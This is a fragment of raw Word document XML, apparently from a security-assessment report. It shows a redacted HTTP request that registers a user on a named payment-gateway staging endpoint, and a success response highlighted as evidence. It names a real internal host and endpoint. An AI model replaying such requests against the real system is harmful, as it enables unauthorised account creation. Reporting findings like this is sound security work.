              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="007B53FD" w:rsidRPr="007B53FD" w14:paraId="39B0EB6A" w14:textId="77777777" w:rsidTr="007B53FD">
              <w:trPr>
                <w:trHeight w:val="7039"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="25109B86"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lastRenderedPageBreak/>
                    <w:t>POST /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>loginservices</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/register/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>createuser</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="092B1BBB"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Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="55D38350"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highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2E617E9D"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Cache-Control: no-cache</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6D430BBF"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w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="40269FDD"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 xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>userName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>mytestaccount</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="24CFB655"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 xml:space="preserve">  "password": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4F929493" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRPr="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="00D1715D">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firstName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="455A9FFF" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRPr="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="00D1715D">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lastName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="40B8D640"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 xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>orgName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "Test",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0E001C36"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 xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>orgType</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "WHIP_TPG",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3546F79E"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 xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>phoneNumber</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "317</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7E96447B"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 xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>emailAddress</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="65CE2BF3"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 xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>secretQuestionAnswers</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": [</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3179007D"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 xml:space="preserve">    {</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0A1494E1"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 xml:space="preserve">      "</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>question</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "What school did you attend for the third grade?",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="52A02A91" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRPr="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">      "answer": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="658DEAAB"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 xml:space="preserve">    },</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="107094D7"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 xml:space="preserve">    {</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4A0AB31A"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 xml:space="preserve">      "</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>question</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "What is your maternal grandmother's maiden name?",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1785D2BA" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRPr="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">      "answer": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="03F1DABA"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 xml:space="preserve">    },</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7060CB0A"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 xml:space="preserve">    {</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4C5A24AF"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 xml:space="preserve">      "</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>question</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "What is the first name of your favorite childhood friend?",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="393E36B3" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRPr="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">      "answer": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="22C544CD"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 xml:space="preserve">    }</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="04ED22CD"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 xml:space="preserve">  ],</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="185CBA0A"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 xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>validateToken</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3859C183"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 xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>validateOtpToken</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="66619B0D"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 xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>validateSecureToken</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4986211B"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w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="53441CD8" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRPr="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B53FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="007B53FD" w:rsidRPr="007B53FD" w14:paraId="04541C6A" w14:textId="77777777" w:rsidTr="007B53FD">
              <w:trPr>
                <w:trHeight w:val="1273"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="7713746A"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highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="40660091"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Date: Thu, 30 May 2019 18:31:46 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="24309078"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highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7623249B"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Connection: close</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3D40466B"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rPr>
                    <w:t>Content-Length: 25</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="65DA574D" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRPr="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>{"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>createUserStatus</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007B53FD">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>":true}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="29D2B027" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRPr="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="007B53FD">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
